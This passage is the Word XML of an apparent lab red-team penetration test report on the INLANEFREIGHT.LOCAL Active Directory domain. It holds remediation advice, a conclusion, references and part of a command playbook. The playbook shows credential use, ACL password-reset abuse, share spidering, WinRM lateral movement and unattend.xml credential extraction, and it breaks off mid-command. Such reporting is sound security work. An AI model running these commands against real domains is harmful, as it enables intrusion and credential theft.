          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Revoke GetChanges and GetChangesAll replication extended rights from all non-DC groups, including Server Admins. Limit directory replication exclusively to Domain Controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7774D7D5" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Remediate Excessive ACL Delegations (High Priority): </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Audit all Active Directory object ACLs using BloodHound Enterprise or Microsoft PingCastle. Remove excessive delegations such as ForceChangePassword, GenericWrite, and GenericAll from unprivileged accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58890A67" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Secure File Shares &amp; Remove Deployment Artifacts (High Priority): </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scan all network shares, scripts, and deployment directories for hardcoded credentials. Enforce strict NTFS ACLs restricting IT internal shares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C60ED5C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Implement Group Managed Service Accounts (gMSA) (High Priority): </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Migrate service accounts (backupadm, mssqladm) to Group Managed Service Accounts (gMSAs) with automatic 120-character password rotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E9107" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Enable LSA Protection &amp; Credential Guard (Medium Priority): </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enable LSA Protection via Group Policy (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1) to block LSASS memory dumping by Mimikatz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8E92A3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Implement Tiered Administration Architecture (Strategic Priority): </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement the Microsoft Administrative Tier Model (Tier 0, Tier 1, Tier 2) to enforce strict boundary separation between Domain Controllers, servers, and endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C2990" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF37BEA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E58A8F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Red Team penetration test against INLANEFREIGHT.LOCAL demonstrated how an initial low-privileged domain user (hporter) can successfully escalate privileges to full Domain Administrator and DCSync domain compromise across 12 distinct operational stages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780185E2" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>By leveraging BloodHound ACL analysis, ForceChangePassword delegations, share spidering, WinRM lateral movement, unattended setup artifact discovery, Sysax service exploitation, LSA autologon memory dumping, targeted SPN Kerberoasting, privileged group self-addition, and directory replication rights, the Red Team achieved complete domain control without relying on zero-day exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7A2B8E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implementing the remediation roadmap provided in Section 6 - specifically revoking replication rights, auditing object ACLs, deploying gMSAs, removing cleartext scripts, and enforcing Tiered Administration - will effectively eliminate these attack vectors and protect the Active Directory environment against sophisticated real-world adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E5DB8E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47247887" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30B7BF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>[1] MITRE ATT&amp;CK Framework, "Enterprise Tactics, Techniques, and Procedures," MITRE Corporation, 2026. [Online]. Available: https://attack.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31061006" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>[2] Center for Internet Security, "CIS Microsoft Windows Server 2019/2022 Benchmark v1.3.0," CIS Security, 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A196C3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>[3] Microsoft Corporation, "Active Directory Security Best Practices and Delegation Guidelines," Microsoft Technical Documentation, 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622195D9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>[4] SpecterOps, "BloodHound: Visualizing Active Directory Domain Relationships and ACL Attack Paths," 2025. [Online]. Available: https://github.com/BloodHoundAD/BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7E8BF6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>[5] Impacket Project, "Python Classes for Working with Network Protocols (secretsdump.py &amp; GetUserSPNs.py)," SecureAuth, 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC25F3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>[6] Benjamin Delpy, "Mimikatz: Extracting Plaintext Passwords, Kerberos Tickets, and LSA Secrets," 2025. [Online]. Available: https://github.com/gentilkiwi/mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D89CFD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>[7] Penetration Testing Execution Standard (PTES), "PTES Technical Guidelines for Internal Network Assessments," 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B7B37" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>[8] National Institute of Standards and Technology, "NIST SP 800-115: Technical Guide to Information Security Testing and Assessment," U.S. Department of Commerce, 2020.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482B6A2" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:r w:rsidRPr="0040297F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A553E6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9. Appendices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32905960" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix A: Complete Execution Command Playbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C181E7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>The following playbook lists, in execution order, all primary commands utilized during the 12-stage privilege escalation assessment:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="54C87717" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28A16671" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 1: Initial Foothold Verification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E3C9A0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nxc smb 172.16.8.3 -u hporter -p 'Gr8hambino!' -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="07BAF165" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29CB633E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 2: Active Directory BloodHound Enumeration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AAB1A29" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodhound-python -u hporter -p 'Gr8hambino!' -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ns 172.16.8.3 -c All --zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11179288" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="505D13CB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 3: Abuse ForceChangePassword ACL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCD28EB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD --host 172.16.8.3 -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u hporter -p 'Gr8hambino!' set password ssmalls mazoniakid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A76E80" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C470801" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 4: SMB Share Credential Harvesting</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C0AF098" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nxc smb 172.16.8.3 -u ssmalls -p 'mazoniakid' -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -M spider_plus --share 'Department Shares'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ABCD614" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>smbclient -U ssmalls '//172.16.8.3/Department Shares'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="296D9575" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C0B7B53" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 5: WinRM Lateral Movement to MS01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F87067B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">evil-winrm -i 172.16.8.50 -u backupadm -p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>'!qazXSW</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A1062BE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71A8E67E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 6: Unattend.xml Artifact Extraction</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="779F56F2" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>type c:\panther\unattend.xml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D786C3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0559C2A2" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 7: Sysax Service LPE to Local Admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F8C6185" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>xfreerdp /v:172.16.8.50 /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>u:ilfserveradm</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
